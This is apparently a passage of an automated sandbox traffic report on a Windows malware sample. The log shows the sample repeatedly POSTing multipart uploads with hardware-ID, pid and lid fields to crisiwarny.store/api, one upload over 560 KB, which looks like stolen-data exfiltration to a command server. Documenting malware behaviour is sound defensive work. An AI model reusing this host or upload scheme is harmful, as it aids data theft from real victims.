                                                                                        2024-10-27 20:06:19 UTC1369INData Raw: 32 6d 35 79 62 2b 77 69 42 44 68 2b 65 39 55 37 38 33 32 55 74 63 73 32 46 72 4c 72 43 33 48 6d 30 46 6e 58 35 2b 61 42 47 5a 69 64 4a 58 6c 38 71 48 5a 4e 45 6c 39 50 6b 68 2f 49 4f 59 66 78 31 48 55 53 73 61 52 63 4f 61 71 64 46 64 6a 77 6f 4e 42 56 74 34 4d 6c 65 33 48 73 5a 51 6f 4f 47 55 6d 62 57 70 46 39 68 2f 4c 55 63 42 53 79 71 6c 55 35 37 39 74 52 33 75 37 6d 69 78 71 57 6b 53 39 36 63 36 42 30 54 68 5a 59 51 70 77 56 77 6a 6a 4c 74 5a 4a 78 43 66 37 7a 45 77 44 70 78 55 4c 50 35 4b 43 58 57 34 76 55 4b 58 6b 33 39 44 70 46 42 56 4e 45 6d 52 2f 47 4f 49 6a 30 31 58 73 58 73 71 46 61 4f 65 7a 63 58 4d 33 72 37 49 59 53 6e 4a 67 67 65 48 32 76 64 77 52 5a 47 55 6d 50 57 70 46 39 70 2f 7a 66 57 42 71 79 72 42 4d 75 70 4d 6f 56 32 4f 53 67 30 46 57
                                                                                        Data Ascii: 2m5yb+wiBDh+e9U7832Utcs2FrLrC3Hm0FnX5+aBGZidJXl8qHZNEl9Pkh/IOYfx1HUSsaRcOaqdFdjwoNBVt4Mle3HsZQoOGUmbWpF9h/LUcBSyqlU579tR3u7mixqWkS96c6B0ThZYQpwVwjjLtZJxCf7zEwDpxULP5KCXW4vUKXk39DpFBVNEmR/GOIj01XsXsqFaOezcXM3r7IYSnJggeH2vdwRZGUmPWpF9p/zfWBqyrBMupMoV2OSg0FW
                                                                                        2024-10-27 20:06:19 UTC1369INData Raw: 6d 65 38 65 51 59 6d 54 30 32 42 45 63 51 78 79 2b 53 63 62 31 47 35 70 78 4e 70 71 74 56 61 31 75 76 76 69 52 79 65 6d 53 74 38 63 71 31 38 51 42 31 54 54 70 45 63 79 44 69 42 2b 4e 4e 38 47 4c 6d 6a 56 44 4c 34 6b 78 75 66 37 2f 6a 49 54 64 4b 39 4b 57 64 35 76 44 70 62 57 55 41 4f 6b 42 61 4a 5a 63 76 2f 32 48 6b 56 75 61 64 56 4e 4f 7a 65 56 4e 44 70 34 49 63 52 6d 5a 30 6f 64 48 71 70 64 30 41 46 55 30 57 59 46 73 41 78 68 72 75 63 4e 68 61 6d 36 77 74 78 32 39 35 62 30 65 2f 32 79 41 72 63 6a 57 35 79 65 2b 77 69 42 42 5a 56 51 5a 51 56 79 6a 36 4b 38 63 42 6b 48 62 65 6a 56 6a 33 68 33 56 50 4e 37 75 2b 42 46 70 47 64 4b 58 31 37 70 6e 6c 44 56 78 63 4f 6b 41 4b 4a 5a 63 76 59 78 57 59 63 2f 72 51 64 4b 4b 72 55 57 5a 2b 77 6f 49 41 59 6d 70 34 71
                                                                                        Data Ascii: me8eQYmT02BEcQxy+Scb1G5pxNpqtVa1uvviRyemSt8cq18QB1TTpEcyDiB+NN8GLmjVDL4kxuf7/jITdK9KWd5vDpbWUAOkBaJZcv/2HkVuadVNOzeVNDp4IcRmZ0odHqpd0AFU0WYFsAxhrucNham6wtx295b0e/2yArcjW5ye+wiBBZVQZQVyj6K8cBkHbejVj3h3VPN7u+BFpGdKX17pnlDVxcOkAKJZcvYxWYc/rQdKKrUWZ+woIAYmp4q
                                                                                        2024-10-27 20:06:19 UTC1369INData Raw: 35 4d 46 46 6c 4b 6b 78 33 4d 50 6f 66 77 31 58 55 65 75 71 4a 64 4f 4f 57 54 47 35 2f 76 2b 4d 68 4e 30 72 55 31 64 6e 75 68 4f 6c 74 5a 51 41 36 51 46 6f 6c 6c 79 2f 66 63 63 78 47 30 72 56 63 30 37 4e 6c 51 33 2b 50 6a 68 78 47 55 6b 43 46 31 66 4b 56 37 51 68 4a 54 52 5a 45 58 79 6a 75 4e 75 35 77 32 46 71 62 72 43 33 48 4b 79 46 6a 54 37 36 43 58 57 34 76 55 4b 58 6b 33 39 44 70 50 47 31 31 4a 6c 78 66 4b 4e 59 37 2f 32 48 4d 52 74 72 6c 62 4d 65 33 42 52 39 2f 68 35 59 51 57 6b 70 41 6f 66 48 47 76 66 67 52 5a 47 55 6d 50 57 70 46 39 70 76 66 56 58 78 61 6c 36 30 78 2f 38 35 4e 53 30 36 69 34 79 42 53 5a 6e 69 46 34 64 4b 70 35 54 78 4a 54 54 35 41 53 78 43 2b 49 39 4e 31 79 45 62 47 74 56 54 44 6c 31 56 4c 57 36 65 69 50 56 64 7a 55 4b 57 30 33 39
                                                                                        Data Ascii: 5MFFlKkx3MPofw1XUeuqJdOOWTG5/v+MhN0rU1dnuhOltZQA6QFolly/fccxG0rVc07NlQ3+PjhxGUkCF1fKV7QhJTRZEXyjuNu5w2FqbrC3HKyFjT76CXW4vUKXk39DpPG11JlxfKNY7/2HMRtrlbMe3BR9/h5YQWkpAofHGvfgRZGUmPWpF9pvfVXxal60x/85NS06i4yBSZniF4dKp5TxJTT5ASxC+I9N1yEbGtVTDl1VLW6eiPVdzUKW039
                                                                                        2024-10-27 20:06:19 UTC1369INData Raw: 4f 51 64 64 55 69 54 4c 4c 6f 2b 73 32 47 4c 6d 77 51 69 66 6e 77 31 4b 66 31 36 37 49 44 64 4c 4d 62 6b 42 30 6f 6e 52 44 41 55 67 44 73 41 7a 44 4f 70 76 38 78 58 6c 52 38 4f 74 56 63 62 4b 41 47 35 2f 73 38 63 68 4e 77 73 5a 31 49 43 54 37 4b 68 59 49 46 31 66 58 44 49 6c 6c 32 62 57 53 5a 46 48 6d 36 78 51 79 2b 4d 46 54 33 50 37 6a 7a 79 75 73 73 7a 52 34 63 62 74 72 65 69 6c 65 56 4a 6f 63 33 69 7a 48 37 74 46 34 48 37 6d 39 45 33 2b 71 33 42 57 48 30 61 44 41 56 61 33 61 62 6d 30 33 39 44 70 78 46 46 64 41 6b 41 7a 59 63 4b 7a 68 33 33 41 47 72 2b 73 64 63 65 79 54 44 59 2b 6d 6f 49 77 45 30 73 78 2b 4a 79 7a 35 4b 52 4e 48 43 31 48 5a 41 34 6b 72 79 36 4f 41 4f 46 47 73 36 77 74 78 72 64 42 48 7a 65 37 6a 6e 68 62 56 71 68 42 62 63 4b 70 2f 51 77
                                                                                        Data Ascii: OQddUiTLLo+s2GLmwQifnw1Kf167IDdLMbkB0onRDAUgDsAzDOpv8xXlR8OtVcbKAG5/s8chNwsZ1ICT7KhYIF1fXDIll2bWSZFHm6xQy+MFT3P7jzyusszR4cbtreileVJoc3izH7tF4H7m9E3+q3BWH0aDAVa3abm039DpxFFdAkAzYcKzh33AGr+sdceyTDY+moIwE0sx+Jyz5KRNHC1HZA4kry6OAOFGs6wtxrdBHze7jnhbVqhBbcKp/Qw
                                                                                        2024-10-27 20:06:19 UTC1369INData Raw: 43 34 51 61 68 66 7a 54 59 41 47 70 70 42 4e 2f 71 74 55 56 68 37 71 75 79 42 47 44 31 48 59 6c 4a 66 63 76 46 30 41 4a 48 49 68 55 30 48 32 64 75 34 6f 6b 58 2f 36 35 45 32 6d 71 6c 46 62 4e 2b 75 61 4c 41 35 48 54 45 45 74 51 6f 6e 31 46 41 55 6c 5a 6d 46 58 6e 43 36 72 46 37 47 4d 53 73 4b 56 55 4a 2f 75 54 47 35 2f 6e 6f 4e 41 73 30 74 78 75 53 6a 6e 73 59 67 52 50 47 58 75 55 46 4d 63 36 6e 65 71 66 55 52 2b 35 71 6b 55 68 2f 64 77 61 38 64 37 42 79 46 76 53 6b 6d 34 74 4a 65 49 36 51 41 59 5a 46 73 64 49 6b 6d 6a 59 72 49 49 6b 44 76 43 79 45 79 65 71 69 77 65 52 71 50 4c 49 54 64 4c 54 4c 57 64 6c 71 6e 6c 53 46 42 35 77 71 54 33 48 4f 6f 72 74 77 6e 73 64 6e 36 68 43 4f 39 54 74 51 4e 7a 6d 37 6f 38 44 67 39 52 67 4e 58 6a 73 49 6e 31 58 45 51 36
                                                                                        Data Ascii: C4QahfzTYAGppBN/qtUVh7quyBGD1HYlJfcvF0AJHIhU0H2du4okX/65E2mqlFbN+uaLA5HTEEtQon1FAUlZmFXnC6rF7GMSsKVUJ/uTG5/noNAs0txuSjnsYgRPGXuUFMc6neqfUR+5qkUh/dwa8d7ByFvSkm4tJeI6QAYZFsdIkmjYrIIkDvCyEyeqiweRqPLITdLTLWdlqnlSFB5wqT3HOortwnsdn6hCO9TtQNzm7o8Dg9RgNXjsIn1XEQ6
                                                                                        2024-10-27 20:06:19 UTC1369INData Raw: 36 62 70 31 57 59 53 2f 49 64 55 50 4f 62 74 61 2b 6a 35 35 35 68 58 74 4a 63 34 64 6a 66 69 4f 6c 78 58 41 51 36 36 43 4d 34 74 69 4c 6e 2b 63 52 79 79 36 30 78 2f 38 35 4e 44 6e 37 43 7a 78 6c 57 41 31 48 59 31 4d 4b 39 6f 56 68 46 61 57 4a 52 64 39 77 4f 6d 36 64 56 6d 45 76 79 61 58 6a 58 38 78 6c 62 50 37 39 36 32 4f 49 43 54 50 6e 59 31 69 55 41 47 4a 6b 39 4e 6c 78 54 4f 66 63 57 37 79 6a 5a 4a 2f 6f 5a 42 4e 76 72 51 46 2f 72 53 6f 72 6b 44 6b 5a 51 67 63 6a 65 7a 4e 46 31 58 54 77 37 50 53 59 64 39 6d 62 75 4b 4e 6c 61 77 70 6c 49 79 35 4e 42 48 7a 65 37 6a 6e 68 62 56 71 68 42 61 66 4b 31 71 53 51 5a 55 53 6f 45 6b 39 78 71 4e 2f 74 56 49 4c 34 6d 36 56 43 47 6f 39 56 62 4a 36 36 44 47 56 59 72 55 64 6a 56 51 71 6e 39 44 56 78 63 4f 6b 31 71 52
                                                                                        Data Ascii: 6bp1WYS/IdUPObta+j555hXtJc4djfiOlxXAQ66CM4tiLn+cRyy60x/85NDn7CzxlWA1HY1MK9oVhFaWJRd9wOm6dVmEvyaXjX8xlbP7962OICTPnY1iUAGJk9NlxTOfcW7yjZJ/oZBNvrQF/rSorkDkZQgcjezNF1XTw7PSYd9mbuKNlawplIy5NBHze7jnhbVqhBafK1qSQZUSoEk9xqN/tVIL4m6VCGo9VbJ66DGVYrUdjVQqn9DVxcOk1qR


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2192.168.2.549706104.21.95.914435536C:\Users\user\Desktop\file.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-27 20:06:20 UTC282OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 12840
                                                                                        Host: crisiwarny.store
                                                                                        2024-10-27 20:06:20 UTC12840OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 32 46 46 43 34 34 42 38 42 36 42 30 34 37 30 42 43 39 44 33 43 34 33 45 44 43 34 44 30 32 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"D2FFC44B8B6B0470BC9D3C43EDC4D022--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                                        2024-10-27 20:06:20 UTC1011INHTTP/1.1 200 OK
                                                                                        Date: Sun, 27 Oct 2024 20:06:20 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=ndro82gmu75a0vuc0498s2jimi; expires=Thu, 20 Feb 2025 13:52:59 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nKrBX%2FuZLPe3izjG%2FGc7hdzLkGCdjikSSntsE4Cz82Q3%2BUjgQ5lOymEp7GdZjhX8ls2FiSmj5WVIymVXtsbt3Mi0Q6ygdwUTYRYKb0geqS8TdLAwQ9bLCWmGbPDNvXgTTbXu"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d954e59fc09e7e7-DFW
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1192&sent=10&recv=18&lost=0&retrans=0&sent_bytes=2838&recv_bytes=13780&delivery_rate=2219157&cwnd=251&unsent_bytes=0&cid=9ff0cf2589d3b4b1&ts=428&x=0"
                                                                                        2024-10-27 20:06:20 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 0d 0a
                                                                                        Data Ascii: 11ok 173.254.250.90
                                                                                        2024-10-27 20:06:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        3192.168.2.549707104.21.95.914435536C:\Users\user\Desktop\file.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-27 20:06:21 UTC282OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 15082
                                                                                        Host: crisiwarny.store
                                                                                        2024-10-27 20:06:21 UTC15082OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 32 46 46 43 34 34 42 38 42 36 42 30 34 37 30 42 43 39 44 33 43 34 33 45 44 43 34 44 30 32 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"D2FFC44B8B6B0470BC9D3C43EDC4D022--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                                        2024-10-27 20:06:22 UTC1008INHTTP/1.1 200 OK
                                                                                        Date: Sun, 27 Oct 2024 20:06:22 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=oi66c0b2j2uhs1914eevnb7jha; expires=Thu, 20 Feb 2025 13:53:00 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=33jc3lQtZQvA7lSodtCRP3hgOVMMuNhORlGrkvapDBQr%2BMMeEcMxc81e8nNAvamlwggMnV3LvBVM9ivRDt6XtlcO0ERRrWF%2BvkjkaURX4FQSO2wc59aZkSUHVvQJKHBKr7fG"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d954e618aa16b77-DFW
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1073&sent=9&recv=19&lost=0&retrans=0&sent_bytes=2838&recv_bytes=16022&delivery_rate=2538124&cwnd=250&unsent_bytes=0&cid=f8b87b92b056058a&ts=572&x=0"
                                                                                        2024-10-27 20:06:22 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 0d 0a
                                                                                        Data Ascii: 11ok 173.254.250.90
                                                                                        2024-10-27 20:06:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        4192.168.2.549708104.21.95.914435536C:\Users\user\Desktop\file.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-27 20:06:23 UTC282OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 20572
                                                                                        Host: crisiwarny.store
                                                                                        2024-10-27 20:06:23 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 32 46 46 43 34 34 42 38 42 36 42 30 34 37 30 42 43 39 44 33 43 34 33 45 44 43 34 44 30 32 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"D2FFC44B8B6B0470BC9D3C43EDC4D022--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                                        2024-10-27 20:06:23 UTC5241OUTData Raw: 5a 3e 93 af 35 13 92 cd 36 8a 95 d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                        Data Ascii: Z>56vMMZh'F3Wun 4F([:7s~X`nO
                                                                                        2024-10-27 20:06:23 UTC1009INHTTP/1.1 200 OK
                                                                                        Date: Sun, 27 Oct 2024 20:06:23 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=jjpqej1lhet9ucfc3gi9o3thas; expires=Thu, 20 Feb 2025 13:53:02 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I%2FPaJV5xWO0YV2LqUZJLwVaPxoX9fcWVYoAHLgL%2BiJzjcv4TNoNM2FdGrsPqjqi7gC3r6DASoSWVI3ApFStg4MM1h1sAzapGLjmWaa3xYm9TADPuFDQjGdG0ZFWjDhcf4dgd"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d954e6a8f654754-DFW
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1186&sent=12&recv=26&lost=0&retrans=0&sent_bytes=2838&recv_bytes=21534&delivery_rate=2427493&cwnd=247&unsent_bytes=0&cid=5f381d5df3f794d4&ts=709&x=0"
                                                                                        2024-10-27 20:06:23 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 0d 0a
                                                                                        Data Ascii: 11ok 173.254.250.90
                                                                                        2024-10-27 20:06:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        5192.168.2.549710104.21.95.914435536C:\Users\user\Desktop\file.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-27 20:06:24 UTC281OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 1258
                                                                                        Host: crisiwarny.store
                                                                                        2024-10-27 20:06:24 UTC1258OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 32 46 46 43 34 34 42 38 42 36 42 30 34 37 30 42 43 39 44 33 43 34 33 45 44 43 34 44 30 32 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"D2FFC44B8B6B0470BC9D3C43EDC4D022--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                                        2024-10-27 20:06:25 UTC1008INHTTP/1.1 200 OK
                                                                                        Date: Sun, 27 Oct 2024 20:06:25 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=c9bfkrucr26pu88mqkedg7k0j1; expires=Thu, 20 Feb 2025 13:53:04 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zIy0wj1T7%2FpH85B%2BWtgLlLaHd2pApdLqYWedanMhd0m7To6B78BNzV4Eno18bmAOjrKl5rFg0y%2FYJvnxl9R6ex5I4MdOiRHlndFx0gBzy2azogmMlXFloEOQo90JQlGUUHwZ"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d954e74bb5f3467-DFW
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1362&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2838&recv_bytes=2175&delivery_rate=2193939&cwnd=249&unsent_bytes=0&cid=7a3a935cacc0143e&ts=550&x=0"
                                                                                        2024-10-27 20:06:25 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 0d 0a
                                                                                        Data Ascii: 11ok 173.254.250.90
                                                                                        2024-10-27 20:06:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        6192.168.2.549716104.21.95.914435536C:\Users\user\Desktop\file.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-27 20:06:26 UTC283OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 569007
                                                                                        Host: crisiwarny.store
                                                                                        2024-10-27 20:06:26 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 32 46 46 43 34 34 42 38 42 36 42 30 34 37 30 42 43 39 44 33 43 34 33 45 44 43 34 44 30 32 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"D2FFC44B8B6B0470BC9D3C43EDC4D022--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
